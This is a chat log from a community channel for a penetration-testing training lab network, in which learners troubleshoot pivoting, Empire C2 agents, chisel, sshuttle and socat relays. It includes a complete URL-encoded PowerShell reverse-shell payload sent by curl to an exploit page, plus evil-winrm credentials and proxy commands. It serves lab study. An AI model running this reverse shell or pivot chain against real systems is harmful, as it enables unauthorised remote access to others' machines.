#wreath-network
1 messages · Page 6 of 1
right click save as doesn't really work well with github
could've sworn I downloaded the binary, I'll try again
well from repositories anyway
you can check by running it on your system when you download it, it should return some usage prompts
I might've accidentally done windows
Weird, I definitely grabbed it from the tools folder. However, I tried using the linux one and it worked
maybe I messed it up when copying it
or did the wrong chmod
is the socat supposed to hang, does that mean it's ready for me to run the ps
right, I didn't background it
Then yes, that's normal
So I set the port in the powershell to the one I'm listening on, and the IP to the .200?
or should it be my tun0
nvm i see
How are we supposed to enumerate the version of the vulnerable git app in the network? I reviewed the default pages source code and I can't find a version.
What do you mean by version?
If you search for the app's name on searchsploit, you will find 3 exploits. One with a version. I also thought it's good practice to enumerate an app's version number before firing an exploit at it.
Anyone know what I'm doing wrong? nothing coming back in the listener.
On 10.200.72.200 using my ssh
firewall-cmd --zone=public --add-port 37683/tcp
success
On my vm
rlwrap nc -lvnp 38504
listening on [any] 38504 ...
On 10.200.72.200 using my ssh
./socat-Ferrari tcp-l:37683 tcp:10.50.73.55:38504 &
Launch from VM
curl -X POST -d "a=powershell.exe%20-c%20%22$client%20=%20New-Object%20System.Net.Sockets.TCPClient('10.200.72.200',%2037683);$stream%20=%20$client.GetStream();%5Bbyte%5B%5D%5D$bytes%20=%200..65535%7C%25%7B0%7D;while(($i%20=%20$stream.Read($bytes,%200,%20$bytes.Length))%20-ne%200)%7B;$data%20=%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString($bytes,0,%20$i);$sendback%20=%20(iex%20$data%202%3E&1%20%7C%20Out-String%20);$sendback2%20=%20$sendback%20+%20'PS%20'%20+%20(pwd).Path%20+%20'%3E%20';$sendbyte%20=%20(%5Btext.encoding%5D::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()%7D;$client.Close()%22" http://10.200.72.150/web/exploit-Ferrari404.php
The section told me which exploit to use, but I also checked source for version and couldn't find it.
Ah, that exploit. Sorry, I thought you meant the literal code being downloaded from the git server for box three
nope, the one for .150
So, yes, it's good practice to get the version number first. Sometimes it's not possible. I can't actually remember if it is or isn't for Gitstack
If it's not possible, then you make an educated guess
according to the login page its gitstack.
For example, the exploit targets one release down from the most up-to-date version, making the probability of it being one of the vulnerable versions very high
Ok. just was double checking that I didn't miss an enumeration step that would have revealed a version number.
That's also why reading the exploit is very important though. If it was dangerous then you'd be less likely to run it, but the worst that could happen there is that it doesn't work 🤷‍♂️
Nah -- you're good
think imma just use the static netcat, cant figure this out
Oh man, that was difficult and confusing. But I got it:) the whole time, it was because I wasn't using burp. the powershell kept getting messed up with the site I was using to encode
gonna try it with socat now
Note: do not end your password with ! or evilwinrm will bug out for some reason
┌──(root💀kali)-[/home/…/Desktop/CTF/TryHackMe/Wreath]
└─# evil-winrm -u USERNAME -p "PASSWORD!" -i 10.200.72.150    1 ⨯
dquote>
switching my password to not ending with ! fixed it though
Even when using single-quotes around evil-winrm -u Ferrari404 -p 'Maserati123!' -i 10.200.72.150?
not sure, I'll give it a try.
also, that was pretty close to my secure password xD
A question can be streamed while hacking this network?
@storm raven now that it's officially released, yes, you can stream it π
Thats good
How long should it take a network to start up, I didn't hit extend. Currently at 11 mins
no rush, just curious
10.200.72 isn't pinging anything
that's not a valid ip
I'm also pretty sure you're not in the 72 subnet?
hmm most of previous pasted commands from Ferrari have been .72
You might be in the 72 subnet.
I'll try restarting vm to see if it's on my end
If you are in the 72 subnet, I would suggest leaving the room and rejoining
Then downloading the new config
72 is my development network that you've been dumped into. There are more users in there than should be in there.
ah ok, I'm assuming I'll have to create another user etc?
Do you have the password hash for the Administrator?
No, I'll grab that real quick then leave
Anyone who faced this error when using the wreath ovpn file:
Cipher negotiation is disabled since neither P2MP client nor server mode is enabled
@merry robin I have a small question regarding the empire part. The kali repo version seems buggy after starting the listener and when the stager connects back from the agent. It just says 500 internal server error on prod-serv. empire spits back wrong type of data coming back from prod-serv. The docker version of powershell-empire works without issue
however, I had to make some modifications to hosting the docker, persistence storage etc. to make it usable. And then i saw http_hop, but that has some minor annoyance which I will fix later.
and the task 20 with the powershell reverse shell, for me it never worked. Not even when I bypassed that task and tried to run the revshell within rdp
how do you stop the machine after completing some task??
i get agent back but i can't seem to execute commands they all are queued up
also i had to make base64 encoding false for stagers cause i was not getting agents back
Which task u r doing man?
29-30
I'm on task 22 rn
Best luck man
Ty i will try that
still agent does not produce output of command i think i will skip
hey could anyone help with task 33 please?
having difficulty figuring out where i should be running this chisel forward proxy from/correct syntax
Hello, sorry to bother you. I have a couple of questions related to the empire section.
ok, to enter a shell command, it seems I have to prepend with the shell keyword but I also noticed I could enter a shell command without it. Is there a difference between the 2?
I haven't tried it without the shell prefix. If it works, it works 🤷‍♂️
I would imagine not
try to get commands correct for the forward proxy to access port 80 on the final machine
from the windows box i've ran this command
Just for the record as well, BC-Sec have a Discord server which Coin linked to above:
https://discord.com/invite/P8PZPyf
That's a really good bet if things are breaking in Empire. The devs are absolutely awesome
@lusty glade that's because you've not added the .exe extension on the compromised machine
I would love to know why it's in the Administrator documents folder and called chisel rather than your username as well...
There are a lot of people in these networks, and those instructions are there to make it fair for everyone. Please follow them :)
@Muiri, ok thanks. Also in task 28, it's written "Empire agents can't be proxied with a socat relay..." but I'm currently using socat to forward things, so I don't understand
oh shit yea ill move that
@restive trout are you relaying the agent?
I will be impressed if you are, given it will be communicating with the wrong place
@Muiri, I believe I'm relaying the agent. In the listener instead of providing the address of my host, I provided the one of the compromised host on which I'm running socat.
And what's catching the agent?
@Muiri, I'm not sure to understand the question. The listener is running on my attacking machine however I changed the value of the Host parameter to http://<compromised_host>:<socat_listenport>
That might work for generating the stager, but I don't think it will actually catch anything, or be able to communicate back?
Actually, put it another way
Do you have a callback from it?
@Muiri, yes, I'm interacting with it
Huh. Who knew. Heck only knows how that's working, but if it works it works 🤷‍♂️
Well done
ok, thanks
do i still need to be running a socat relay from the prod-serv?
im getting this error now im the window machines
@muiri, I'm not using sshuttle
@lusty glade did you upload the linux version?
I HATE MY LIFE
yasss
-.-
so i should just need the sshuttle running and the chisel client/server?
or do i need the socat relay on prod-serv ?
@restive trout I think the answer is probably something along the lines of "that's really not how it's meant to work, and I suspect it might cause problems down the line if there were more machines in the network or you needed to do any kind of lateral movement, but if it works here then hey, it works, right?"
So, maybe not recommended but you're quite correct -- it is apparently possible to catch an agent through a socat relay
That should do it, yep. The relay isn't necessary once you have a forward connection to the target
@merry robin, yeah probably. I'm not experienced enough with empire. I tried to use it a couple of years ago but I gave up
It's a really nice tool, with some big improvements inbound as well
thank you they finally seem to be connected
Yay!
Me again..... task 20, I altered the 43777 exploit on nano as directed.. put the python2 shebang, added my username to exploit.php in both instances, inserted the target IP (I used sshuttle before so, it's the IP, by what the task says)
But when I try to run the exploit
./43777.py
I get the following
Traceback (most recent call last):
File "./43777.py", line 18, in <module>
import requests
ImportError: No module named requests
I went to check it on nano again, line 18, it says import requests
What am I doing wrong this time. I feel so stupid to be stuck like that
Thank you so much in advance for any guidance
@high totem you should use the pip installer: pip install requests
Just did but....
Requirement already satisfied: requests in /usr/bin/python3 etc etc etc
So it's installed for python3 but not python2
May I know how to install this for python2, please?
I tried to http_hop listeners but I'm unable to interact with the agent. I configured 2 listeners:
- GitServer on port 65000
- GitServerHop with GitServer as the redirect listener
I copied the generated files on the compromised GitServer, I added a new firewall rule and I started the php server: php -S 0.0.0.0:65000 >&/dev/null
For the stager, I used GitServerHop as the listener and copied the output in a cmd shell.
I get a call back from the agent but I'm unable to execute commands
@high totem, use the package manager of your distribution
@lusty glade lol
It keeps saying requirement already satisfied
Tried to run the exploit again, got the same error as above.
Try python2 -m pip install requests
If that doesn't work, you can try the get-pip.py script (should still be online) then run the command I just gave you
Failing that, just put every print statement in brackets (e.g. print("test") rather than print "test") and change the shebang to python3
try the same command with python2.7
@merry robin Sorry to bother you again, do you have an idea of what I'm doing wrong?
@oblique oar python2 is just a symlink to 2.7 anyway. Makes no difference
yeah i thought so but for some reason that worked for me
@high totem try the get-pip.py script?
I will google that, thank you so much
What's up?
@Muiri I'm trying the http_hop thing. The agent connects back but I'm unable to interact with it
I described a little bit earlier the steps I took
Ah, that's an issue with Empire currently. Try updating Empire and if it still doesn't work, just leave it for now
hmm ok, I downloaded the latest version from BLSecurity's github repo
Ok, just leave it for now then. The fix will be merged soon, I'm sure
ok, thanks
last check is 3.7.2 the latest version available?
@high totem do this...and run the file with python3
Yes, I will do that. Thank you so much.
@high totem rather than cloning it, read the instructions in the readme
Replace #!/usr/bin/python2 with #!/usr/bin/python3 in your code 1st line
Can't believe I'm saying this, but it's worth having a working install of Python2 -- most python exploits are written in it, and converting them all is a pain
This one is an easy one to convert, all things considered.
I'm sorry.
@Muiri, last question please. In empire, a module is something that gets loaded by the agent on the remote host or is it something else?
Essentially, yes
It's code that's being loaded into memory through the agent and getting executed that way.
ok, thanks a lot. I thought for a while that a module was something that was getting loaded in the empire C2, lol. I'm so stupid
Are you running that in python2 or python3?
@high totem try specifying python2 get-pip.py?
Or convert it.
Ah, so, the format needs to go immediately after the quotation mark -- inside the print brackets
I just tried putting parentheses on every print to make it python3
There's your problem
The script is most likely meant to be run in Python 2
Some things aren't available in python3 and vice versa
But it won't run in python2 here
Gimme a sec -- I'll upload a converted copy
print ("[+] Found user {}".format username)
?
Looks good!
Put parenthesis around username
I feel so stupid
I need to learn python right now
.format(username)
Oh boy
So ...
It comes with time
Definitely worth learning though
Muiri, if you want to take a break I can convert the script for you.
Converted copy of the Gitstack script:
Oh, I already have one
For us stupid n00bs who don't know python
I thank you so much
Yeah yeah, I should get back to my day off
You should!
Np
I'd suggest having a read through that to see where the differences are as well
I'm so sorry to bother you on your day off.
Great idea!
Np
Let's be honest -- I'm a huge workaholic anyway
-mute @merry robin 24h Get some rest
Unable to run the command: Can't use moderation commands on users ranked the same or higher than you
Hello i am not able to access to Wreath web host
For some reason, I am getting (since like half an hour ago) "No route to host" errors on ssh, nc & curl to the public server, but can access it over the browser. I am super confused. Any ideas how I can debug it?
Connected to the VPN?
Yes
The wreath one?
did the DNS thing?
Unable to ping 10.200.81.200
Traceroute stops at 10.50.82.1
So i am not able to hop out of my network
Any similar incident with you?
Hey I am having exactly the same problem
I can indeed not access it in my browser anymore either, it was cached content -.-
Well, I guess its time to go hack somewhere else ...
Routing problem?
THM problem, since 1 hour ago it was working fine
Yes
but nothing works for me alone ??
I was starting with it
Top, please be patient. Your problem will not be fixed within 10 minutes.
I was refreshing to access the web site and boommmm
Jabba do you know something about this problems?
Has the network gone to sleep by any mischance @lapis yacht..?
In my case its says its running
Are you both on the same network?
No, I am in 83 and he is in 81
10.50.82
And it was working before?
82&83
83 was working yes
Naw, it's 81 and 83
all day, and yesterday night
The VPN packs are one subnet up from the network they access
no me on 82
@fair breach could you check those networks for me please?
Not if your VPN pack says 82 you aren't
You're also pinging 81
Thanks for the fast reaction Muiri. I am enjoying the room a lot so far, amazing work.
sorry you mean the server
this is the ip of the web server
but i am on 10.52.82
only for info
ok sorry
Np!
in my case I am not able to get out of my subnet
the first spot does not seem to be alive or not responding
Sorry 10.50.82.1 is up
something has changed i think
.1 is to do with AWS
finally finished! really enjoyed it
Lemme login to AWS real quick
thanks to everyone involved
10.200.82.* & 10.200.83.* aye?
10.200.81.
.82 is up .83 isn't
200 is down?
neither is .81
Ok, so 81 and 83 are down -- that explains something
What one are you on @potent urchin?
Would I be right in thinking you can't restart them or force a reset?
Are you connected to the VPN?
Not for wreath unfortunately
Can Skidy?
yesss
yep, i'm connected
afaik
Whats your IP?
@limber rover could you possible reset/restart the 81 and 83 subnets?
Whatever brings 'em back online
I can launch & terminate not reboot or shutdown kek
even then idk how'd that play up with the front end so I don't wanna touch it
I should be able the ping the first box, right ?
PING 10.200.83.200 (10.200.83.200) 56(84) bytes of data.
From 10.50.84.1 icmp_seq=1 Destination Host Unreachable
You should
But that's one of the subnets I just asked Skidy to restart because it's down
Yep, I know that feeling
so that explains the dest host unreachable error ?
Yep
ah ok thanks
Not sure why it's down, but Skidy will bring it back up
Please someone in the same network ping me when it gets back up, thanks
Thanks
Users should now be able to "start" the network which will bring all the machines back up
yup, its up thanks
Could they not already?
They were "already" up
Oh, he might have just shut it down properly, I see now
no not work
the start button does not work
The wreath network is up. I have a shell.
There are several networks
Hello,
I have a problem connecting to the lab wreath.
I can't ping the machine anymore, it happened suddenly.
I have tried several things:
- regeneration of a VPN package -> NOK
- reboot the machine -> NOK
- check processes to see if there were two VPN instances running -> NOK
The state of the lab is correct though.
post here the destination final IP of the web server
We have some issues with this and they are working on it
all ip
I reach the server but after putting in my host file the ip and name not able to reach the web but "working" with 10.200.81.200 in the browser...
On my side, it doesn't work even with DNS resolution.
Yes, it's clear.
I was able to work on the first 16 tasks without any problems and now nothing.
same for 3/4 more users here in chat
Okay, I'll wait in that case
after gaining access to the first target using any command in the pseudoshell gives me a lot of exceptions like these below:
# id
Unhandled exception in event loop:
File "/usr/lib/python3.9/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/usr/lib/python3/dist-packages/prompt_toolkit/input/vt100.py", line 168, in callback_wrapper
callback()
. . .
Exception [Errno 13] Permission denied: 'commands.txt'
Press ENTER to continue...uid=REDACTED
context=system_u:system_r:initrc_t:s0
WARNING: your terminal doesn't support cursor position requests (CPR).
is this a problem on my side or on yours?
maybe the version of python?
Looks like you downloaded the exploit to a folder you don't have write access to
What OS are you using as well?
I have downloaded the latest Kali image just for the Wreath. Then I tried to apply some knowledge from Hardening Basics room and forgot I'm not running on my working Kali version. You are absolutely right about the write permissions.
I cant access to the network
Are you a subscriber or currently have a 7 day streak?
I am having the same issue, i have a 7 day streak, also if I go in the access tab it says i am connected to the wreath network, and Network State is running, but i can not ping the machine, ip is 10.200.92.200
@merry robin Looks like it might be down again?
Which one?
no idea
Which subnet are you on?
10.200.93.0/24
tried remaking my ovpn key and got the same IP back
Yeah, there have been one or two issues with 91,92 and 93 today for some reason
@merry robin saw you added the "please clean up after you're done" question
Yeah -- figured it might be necessary
Not a question related to the network, but when we have a windows machine x64 is it recommended to install nmap normally, or still using the static version?
Using sshuttle I can't seem to use the id_rsa to authenticate with the key. My syntax is --ssh-cmd "ssh -i root_id_rsa" but i get Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
c : fatal: c : failed to establish ssh session (2)
ssh key is broken for some reason
the key itself or the auth_key file
that has the public key in it
On your host?
Either way, static nmap for Windows doesn't really exist
The network is back up then?
No, i mean on the target machine
@ember solstice Which subnet?
83
@merry robin still looks down
Could you disconnect and send me your VPN pack in a DM please?
How's the key broken then?
the id_rsa works with ssh
Oh, it works with ssh but not sshuttle?
yes
@merry robin @ember solstice was asking about the key was replying to him
or her idk
also the network is still down
D:
Ok, could you disconnect and DM me the pack?
sure
Not long. 5 minutes at the absolute maximum
Anyone know why I'm getting this?
```
* Starting Empire SocketIO on port: 5000
<frozen importlib._bootstrap>:228: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:228: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
- Starting Empire RESTful API on port: 1337
[1] + segmentation fault ./empire --headless
```
Occurs when I try to run starkiller, no options for listeners in gui. Empire CLI works fine
That's log from my ./empire --headless &
I'm gonna suggest asking over in the BC-Sec discord for that one
says failed to connect to socket io
I realized I had to make a listener for the redirect to connect to.
okay so im doing the wreath room now i try to cat the id_rsa but it's blank for some reason am i missing something
@merry robin Someone broke your network again
same for me, issue still exists (ssh -i ....)
it's not empty
Disconnect and send me the config file please
@wet tapir if you can ssh into the box using the id_rsa, and you're using the right syntax and still having problems, Muiri should help you
$ ssh -i ./id_rsa root@10.200.99.200
root@10.200.99.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
-> id_rsa and id_rsa pub on the server has a timestamp of today (did somebody mess with those), and the id_rsa.pub ends with root@kali, differs from authorized_keys
Yes, someone has been messing with it
Please disconnect from the network and DM me your config file @wet tapir. I can fix manually
And if I find out who's doing that, I will ban them -- either from the room or the site, depending on my mood
(Just in case anyone's watching who thinks the trolling is anything other than selfish and pathetic 🤷‍♂️)
Is 10.200.108.200 down?
I can't ping it and all of the nmap scans I've tried aren't returning anything
Is the network started?
Yes it is running
Are you on the right connection pack?
Yup, double checked that already
It is giving me an IP in the 10.50.109.0/24 subnet though
is that right?
Yep, that's correct
Question is, is anyone awake to see if it's active
What ip exactly do you have @stone ivy?
10.50.109.9
So not a new subnet. Hm.
If it shows as running but isn't, try going for a reset -- others will do the same if something is up with it
I suspect the admins are asleep (and I've already pinged 'em a good 20 times today troubleshooting), so there's no easy way to check from the back end just now
Sounds good. I appreciate your help. I voted for a reset and we'll see if we happens
*what
Hopefully that'll fix it. Lemme know if it hasn't got the votes to reset and I'll check in the morning. Need some sleep just now
I finally understand sshuttle! I've been manually running ssh port forwards the whole day into the network and over complicating my pivots like an idiot. Now to go over my lab report notes and grab new screenshots with the new configurations and edit.
I feel like sshuttle should be moved to the first pivot task in the room to stress it's simplicity and importance.
This is the description of this room
Learn how to pivot through a network by compromising a public facing web machine and tunnelling your traffic to access other machines in Wreath's network. (Streak limitation only for non-subscribed users)
What does the streak limitation part mean?
Can I only access it for certain days?
I think it means if your a non subscriber you need to have a 7 day answer streak to join and access to the network.
Ah great!
yes ;_;
hey, with the final pivot, im struggling a bit. so my situation is I have my home machine (windows, burp suite) connected to the attack box via ssh -D 8228. the attack box is connected to .200 via sshuttle. back on my host, with burp using a 8228 as a socks proxy, i can browse gitstack through the attack box, easy
i have evil-winrm onto .150, and can setup win-chisel there, and even setup a proxy between the attack box and .150, say on port 1088
but... i guess my brain fail is, how would i use the burp proxy browser from my host, through the socks proxy to the attack box, through the chisel proxy to .150, in order to hit .100?
feel free to say 'hey, go read this doc on chaining proxies BRO' if thats what i should be doing
So, a bit of an update. I built the empire from source and it's working now without an issue. However when trying to run the agent payload on gitserv it keeps breaking after connection established
And before that I had similar issues with the power shell revshell
Which step I then bypassed for that reason
Hello everybody.
I have a problem running socat on the target,
[root@prod-serv tmp]# ./socat-zarandija: error while loading shared libraries: libwrap.so.0: cannot open shared object file: No such file or directory
Can someone give me a hand?
I don't think you're using a static socat binary
I'm going to check out that possibility man, thanks.
They provided a link to download static binaries, download socat from there and transfer that to the box
That was the problem, thank you very much for the help.
I can't seem to get a response back from my agent on GIT server
Hi, I can't access the prod-serv........
Network is running but I can't seem to reach the prod-serv...
@charred fern leave and rejoin the network (then redownload the VPN pack). You're currently in the dev subnet
Muiri, Wreath is being mean and making me develop a port scanner. Now I'm looking up RFCs to figure out what to shove in the socket connection because I don't like half-arsing these things
Why are you developing a port scanner..?
alright. thanks
the port scanner bit I already have, but it's the ping sweep bit I need
Why not use nmap/Invoke-Portscan.ps1?
no nmap on the web server
Don't blame me then 
You're being mean to yourself π€£
You just described the essence of hacking: being mean to yourself
True 
hey,
I am trying to upload a nc to the linux first machine
but seem like it not working
I got the binary from the attackbox once and from github
any advice ?
Not working in what sense?
Looks like something wrong with the binary
That ain't a binary
You've downloaded the github webpage by accident
Make sure you get the link to the raw file, rather than the page itself
my mistake this is the error
So, that would indicate that you're using a dynamic binary -- not a static one
ahhh, so I have to look for static one
Mhm -- try the one in the tools zipfile if github isn't doing it for you
Thank you so much, btw great network so far
Just added a more expanded note on static binaries into the Enumeration task
great, something new to learn thank you again
Np, enjoy!
Hey, people on .83 are you guys able to load /resources on .100 ?
mine just keeps hanging
After entering the creds that is
yep, i think someone's messing with it since now it doesn't even accept the creds (401)
@merry robin could you take a look at this please ?
Yeah -- you still on the same VPN pack @ember solstice?
Yes, should i disconnect ?
Please
sorry for my questions,
what could the problem be if I can connect via
xfreerdp /v:ip /u:user /p:pass
but when I try to get the share it didn't work
xfreerdp /v:ip /u:user /p:pass +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,rumbleshare
What's the error?
[14:22:45:581] [28563:28563] [ERROR][com.winpr.commandline] - Failed at index 6 [/drive:/usr/share/windows-resources,rumbleshare]: PostFilter rule could not be applied
FreeRDP - A Free Remote Desktop Protocol Implementation
See www.freerdp.com for more information
Try it the other way around @high dirge
/drive:rumbleshare,/usr/share/windows-resources
still the same
Try it with the current directory as a test?
as in /drive:.,share
The other thing that can sometimes cause problems with it apparently are permissions, so try doing it as root as well
this work as charm
There we go then 🙂
this smiley face, scare me LOL
Heh, it's better than my usual
🙂 is a great emoji. It can be anything from really happy, to incredibly threatening, depending on the context
so the mistake I did was that I don't have the share /usr/windows... in my machine yes ?
Hello all
I'm getting the very same thing, and I downloaded the nc from the task
If you don't mind I have a couple of questions, the room author refers to the fact that AV uses sandboxes for malware detection. My question is how close are those sandboxes to the Virtual Machines that we use (for instance virtualbox). Does the AV have an hypervisor with hardware virtualization and a full operating system installed on it or is it something else?
I clicked on netcat, downloaded it, renamed it adding my username, and I'm getting the same error as the person above
I even did the same thing he did.... googled netcat static binary, went to github, downloaded it from there, tried again, very same error
can you screenshot the error?
Well, that's definitely a webpage. Interesting
That's the second, from github....
Try the one in the tools zipfile?
This one is the first, from the task
The errors are the same
I don't have the netcat in the tools. Nmap only
Netcat is in the tools zipfile in the cats directory
In the tools we downloaded when we started the network
I'll try this one then.... sorry, found it
Np
Give it a shot
That indicates that the upload to the target isn't working. What's your webserver showing?
Ok, that looks good. Are you trying to upload netcat to get a shell back?
Yes
Ok, so show me the Python webserver serving it?
But after downloading it from the task, then from github, then from the tools I downloaded at the beginning of the network, I keep getting the exact same error
404ing?
Yes
Stop the webserver and do ls?
Can you show me?
Ok, so it's not called nc, the file you're trying to upload
So when you're doing curl, you'll need to use the full file name
The task asks us to rename, yes? Using our usernames
Yep, but you'll need to upload it using whatever it's actually called
So try starting the webserver again, then grabbing it with curl http://10.50.107.8/nc-tzipi -o nc-tzipi
I have a question related to smb authentication. Does smb require mutual authentication? I tried to copy a file without enabling the -user and the -password option and it just failed, despite the server returning a successful authentication message to the client
Then show me the webserver output
Ahhhhhhhhhhhhhhhhh
Mutual authentication?
yes, by that I mean the client has to authenticate and the server has also to prove that he knows the secret.
It shouldn't do, afaik
the "net use" command didn't work without the -user and -password options on the server
So that is to do with the settings on the Windows server
Default Windows Server 2019 won't allow connections without authentication
I hope this is correct....
I found my mistake.... the python web server was being done in the wrong directory
I got both the nc and the web server in the same place....
It's 12:30 at night here and I'm doing this after working 10 hours operating industrial machines....
I apologize for the stupidity
Not at all -- it happens
You've seen it once now, so you'll know for next time. That's the important bit!
Oh Iβll never forget this experience..... Iβm learning a lot... trying not to give up!
Now I can hopefully go on and not bother you anymore for the night!!!!!!
Thank you so much again
Anytime
@Muiri, Does it mean that it tries first to connect without authentication and if it's successful it disconnects? I'm having a hard time understanding.
Essentially, net use lets you configure connections to shared resources. If there's no authentication then you can just skip that bit entirely because there's no configuration necessary -- you can just connect directly. If you try to connect without specifying the credentials, the user account on Windows tries to connect using its own credentials, which are denied obviously.
I am facing another issue
I have made a chisel connection and all ok and I did forward it to port and get the connect (task 33)
but when I try to reach the webapp on (||.100|| host) I cant
So the connection was successful if you didn't use net use first, but the authentication was not
Are you connecting through proxychains/foxyproxy?
foxyproxy
What error are you getting?
just got it, get scared and remember things I read in pivot section ty
cause of this
yo
hate to be that guy
but I am getting failed to connect in task 6 for the CVE
I still didn't test any other exploits outside the one coded by the one and only Muiri
What IP? And can you ping it?
10.200.111.200
I cant ping it but when I visit the dns it works
that's why I was like something's wrong
didn't reset it
" yet "
There isn't any DNS in there. Did you add anything to your hosts?
It was adding a line to your hosts file. DNS isn't something we control as hackers
Could you disconnect from the VPN and DM me the config file?
sure thing
I'll have a look at the box and make sure it's all working
Just finished it. Amazing. Definitely will play it again in the future and do all the bonus questions that I skipped this time XD
@merry robin Sorry to bother you again. I did some tests and basically the client stops the connection when the server doesn't sign the message. The signature requires the server to know the user password hash.
Hey, hopefully my last question regarding this Network haha, I can't stop the || service || on .100:
||sc stop SystemExplorerHelpService
sc stop SystemExplorerHelpService
[SC] ControlService FAILED 1052:
The requested control is not valid for this service.||
It says I have 9 days of access left. Does that mean I have to finish Wreath in that time?
You can rejoin after that time expires
Okay, perfect! Thank you
It's mostly so that people don't take spaces up in networks when they're not working on Wreath
But the network state might get reset during the time block, or after being 'evicted', right? I.e. backdoors you install/configs you change would be reset
Yeah the network might be reset during those 10 days. Important to keep notes.
When you rejoin, I don't think you'll get put onto the same network.
thanks. I'm gonna start on it tomorrow
Thought maybe because other people were doing the priv esc part it was throwing an error but im still getting the same error.
hey,
I am in the last few tasks and when I try to stop the services on the win I got this error
Same
Are you on .83 ?
yay
yeah same
so its an issue in the network we are in ?
Maybe
so what do you think we should do
Probably wait for Muiri to take a look at it
welp there goes all my connections chisel died on me 
Maybe we should vote for a reset @high dirge
I don't know what else we can do but wait, either for a reset or for Muiri
I finished all other tasks and trying to keep my connection
yep, i just need Administrators NTLM hash
Try deleting the System.exe binary and starting the service to reset it. That should happen every 5 minutes anyway
my listener after a while LOL
did you manage to get it working ?
nope seem like I will give up and get the hash from dark video
Which subnet is this?
.83
.83
Ok. Could you possibly disconnect @ember solstice? (Apologies, I know it's a lot of pivoting to get back). I'll go in and reset it manually
Oh, actually, I can get it to send you a shell straight back on a timer after sorting it
sure, Thanks
done
I have got to get a management interface sorted smh
what should we do ?
Nothing for now. I'm just fixing it
tyt thank you
Should be fixed, if you wanna go for it
@ember solstice just setting up a reverse shell for ya
Thanks
it is I can stop and restart it but cant get rev shell odd
Have you checked your wrapper is working?
how can I ?
i did exactly what in the tasks
Muiri should i connect back ?
@ember solstice Apologies -- you are going to have to go back through it. I can't set up a task to send a shell back without breaking the way it's set up
Yeah -- connect back though
Its alright, i've bugged you enough hehe, thanks for fixing
Try just running the wrapper with your own account and see if it connects back?
it works and gives me the same shell (thomas) but when I do the sc stop and start nothing happens
||whoami
whoami
nt authority\system||
that fast ohh Congrats
good notes help get back to where you were quickly
haha thanks still have to get the hash
Sounds like that might have been because Cyb3ri0us overwrote your shell
Try copying it in then restarting the service once more?
are you doing a youtube for the room @ember solstice
Worked Thanks for all Muiri, ||you are a hero for creating such a network ||, pleasure to know you and thanks for all the help.
You are most welcome!
Oh im sorry,
Maybe
Finished ! Again, Muiri this is like the 3rd time im telling you but this was super awesome, thanks for putting it together 
hello?
Finished wreath today. Great work. Had a few minor issues with empire not running modules but just transferred the files instead. Learnt a lot for sure and hope more like this can come to try hack me. Windows is a fresh domain to me, and my next step in pen testing. Running winpeas isn't enough to please me.
May have a few ideas for that
Hey, I'm on the PC machine and I uploaded winpeas to the temp folder, and I tried to run del command on winpeas exe to do clean up. But the system says it can't find the said file. Why is this? Sorry for this simple question, but I couldn't figured it out. Network is great by the way, I enjoyed it a lot :)
are you as root
or an escalated user, it depends on the user account that uploaded the file if you can see it
Do I need more privileges than the account I uploaded as to delete the same file I uploaded?
No, it was caught by defender and deleted automatically
It was obfuscated, I can still run it
Not sure if this already asked..Will this room available after 9apr?
Yes.
Great, thanks
Are there any problems? This evening all was working ok, but now I can't access the network. Destination Host Unreachable. I reloaded the vpn many times but still nothing.
Check that the network is still active?
Now it's working again.
Don't know what happened. Apparently it was running. Thanks anyway.
Thanks a lot for the amazing network, Muiri just completed it. Was super educational and fun at the same time 
Congratulations. Did you submit your Pentest Report?
Hi, how can I delete the netcat binary in the temp directory when I am still connected through netcat?
It says access denied
Connect through a new ssh?
I see, thanks
Making one right now, and trying to structure it more properly 
Im trying to set up a forward socks proxy to git-serv but im getting the following error:
*Evil-WinRM* PS C:\Users\Administrator\Documents> netsh advfirewall firewall add rule name="Chisel-bluemoon" dir=in action=allow protocol=tcp localport=8888
Ok.
*Evil-WinRM* PS C:\Users\Administrator\Documents> ./chisel.exe server -p 8888 --socks5
chisel.exe : 2021/03/27 00:22:05 server: Fingerprint DXdZdW4k0QztEjfKp2MMZLU6rrc6NZTl01ixlgS8LhQ=
+ CategoryInfo : NotSpecified: (2021/03/27 00:2...ZTl01ixlgS8LhQ=:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2021/03/27 00:22:05 server: Listening on http://0.0.0.0:8888
@trail kite is that an error?
Or is it saying that it's listening?
(Also, what happened to only opening ports over 15000?)
i tried on different ports
i was first working on 28080 then 28888 then 18080 then 18888
lol
i think its an error but idk. im unable to get the socks to work
I mean, that's executing correctly
maybe im doing smtg wrong. let me retry. stand by
The command output you showed indicates that the listener is set up correctly
im getting this error tho
./chisel client 10.200.109.150 1337:socks
2021/03/26 20:43:43 client: Connecting to ws://10.200.109.150:80
2021/03/26 20:43:43 client: tun: proxy#127.0.0.1:1337=>socks: Listening
2021/03/26 20:43:43 client: Connection error: websocket: bad handshake
2021/03/26 20:43:43 client: Retrying in 100ms...
2021/03/26 20:43:43 client: Connection error: websocket: bad handshake (Attempt: 1)
2021/03/26 20:43:43 client: Retrying in 200ms...
2021/03/26 20:43:43 client: Connection error: websocket: bad handshake (Attempt: 2)
2021/03/26 20:43:43 client: Retrying in 400ms...
2021/03/26 20:43:44 client: Connection error: websocket: bad handshake (Attempt: 3)
2021/03/26 20:43:44 client: Retrying in 800ms...
2021/03/26 20:43:45 client: Connection error: websocket: bad handshake (Attempt: 4)
2021/03/26 20:43:45 client: Retrying in 1.6s...
2021/03/26 20:43:47 client: Connection error: websocket: bad handshake (Attempt: 5)
2021/03/26 20:43:47 client: Retrying in 3.2s...
2021/03/26 20:43:50 client: Connection error: websocket: bad handshake (Attempt: 6)
2021/03/26 20:43:50 client: Retrying in 6.4s...
2021/03/26 20:43:56 client: Connection error: websocket: bad handshake (Attempt: 7)
2021/03/26 20:43:56 client: Retrying in 12.8s...
i do have sshutte
You haven't specified the port to connect to there
